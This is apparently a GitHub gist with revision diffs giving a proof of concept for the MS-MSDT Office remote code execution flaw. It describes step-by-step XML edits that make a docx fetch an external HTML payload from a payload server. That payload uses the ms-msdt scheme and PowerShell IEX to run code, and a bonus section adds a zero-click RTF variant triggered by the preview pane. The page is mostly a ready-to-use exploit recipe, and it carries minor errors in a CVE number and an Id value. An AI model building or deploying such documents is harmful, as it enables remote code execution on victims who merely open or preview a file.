Skip to content

Instantly share code, notes, and snippets.

@abdilahrf
Forked from tothi/ms-msdt.MD
Created June 4, 2022 05:42
Show Gist options
  • Save abdilahrf/b37074283e01fa60620e7c900c89f3ce to your computer and use it in GitHub Desktop.
Save abdilahrf/b37074283e01fa60620e7c900c89f3ce to your computer and use it in GitHub Desktop.

Revisions

  1. @tothi tothi revised this gist May 30, 2022. 1 changed file with 13 additions and 0 deletions.
    13 changes: 13 additions & 0 deletions ms-msdt.MD
    Original file line number Diff line number Diff line change
    @@ -44,3 +44,16 @@ NOTE: The created malicious docx is almost the same as for [CVE-2021-44444](http

    Note that the comment line with AAA should be repeated >60 times (for filling up enough space to trigger the payload for some reason).

    ## BONUS (0-click RTF version)

    If you also add these elements under the `<o:OLEObject>` element in `word/document.xml` at step 3:

    ```
    <o:LinkType>EnhancedMetaFile</o:LinkType>
    <o:LockedField>false</o:LockedField>
    <o:FieldCodes>\f 0</o:FieldCodes>
    ```

    then it'll work as RTF also (open the resulting docx and save it as RTF).

    With RTF, there is no need to open the file in Word, it is enough to browse to the file and have a look at it in a preview pane. The preview pane triggers the external HTML payload and RCE is there without any clicks. :)
  2. @tothi tothi revised this gist May 30, 2022. 1 changed file with 1 addition and 1 deletion.
    2 changes: 1 addition & 1 deletion ms-msdt.MD
    Original file line number Diff line number Diff line change
    @@ -8,7 +8,7 @@ Here are the steps to build a Proof-of-Concept docx:

    1. Open Word (used up-to-date 2019 Pro, 16.0.10386.20017), create a dummy document, insert an (OLE) object (as a Bitmap Image), save it in docx.

    2. Edit `word/_rels/document.xml.rels` in the docx structure (it is a plain zip). Modify the XML tag "<Relationship>" with attribute
    2. Edit `word/_rels/document.xml.rels` in the docx structure (it is a plain zip). Modify the XML tag `<Relationship>` with attribute

    ```
    Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject"
  3. @tothi tothi created this gist May 30, 2022.
    46 changes: 46 additions & 0 deletions ms-msdt.MD
    Original file line number Diff line number Diff line change
    @@ -0,0 +1,46 @@
    # MS-MSDT 0-day Office RCE

    MS Office docx files may contain external OLE Object references as HTML files. There is an HTML sceme "ms-msdt:" which invokes the msdt diagnostic tool, what is capable of executing arbitrary code (specified in parameters).

    The result is a terrifying attack vector for getting RCE through opening malicious docx files (without using macros).

    Here are the steps to build a Proof-of-Concept docx:

    1. Open Word (used up-to-date 2019 Pro, 16.0.10386.20017), create a dummy document, insert an (OLE) object (as a Bitmap Image), save it in docx.

    2. Edit `word/_rels/document.xml.rels` in the docx structure (it is a plain zip). Modify the XML tag "<Relationship>" with attribute

    ```
    Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject"
    ```

    and `Target="embeddings/oleObject1.bin"` by changing the `Target` value and adding attribute `TargetMode`:

    ```
    Target = "http://<payload_server>/payload.html!"
    TargetMode = "External"
    ```

    Note the Id value (probably it is "rId5").

    3. Edit `word/document.xml`. Search for the "<o:OLEObject ..>" tag (with `r:id="rd5"`) and change the attribute from `Type="Embed"` to `Type="Link"` and add the attribute `UpdateMode="OnCall"`.

    NOTE: The created malicious docx is almost the same as for [CVE-2021-44444](https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-40444).

    4. Serve the PoC (calc.exe launcher) html payload with the ms-msdt scheme at `http://<payload_server>/payload.html`:

    ```
    <!doctype html>
    <html lang="en">
    <body>
    <script>
    //AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA should be repeated >60 times
    window.location.href = "ms-msdt:/id PCWDiagnostic /skip force /param \"IT_RebrowseForFile=cal?c IT_SelectProgram=NotListed IT_BrowseForFile=h$(IEX('calc.exe'))i/../../../../../../../../../../../../../../Windows/System32/mpsigstub.exe \"";
    </script>
    </body>
    </html>
    ```

    Note that the comment line with AAA should be repeated >60 times (for filling up enough space to trigger the payload for some reason).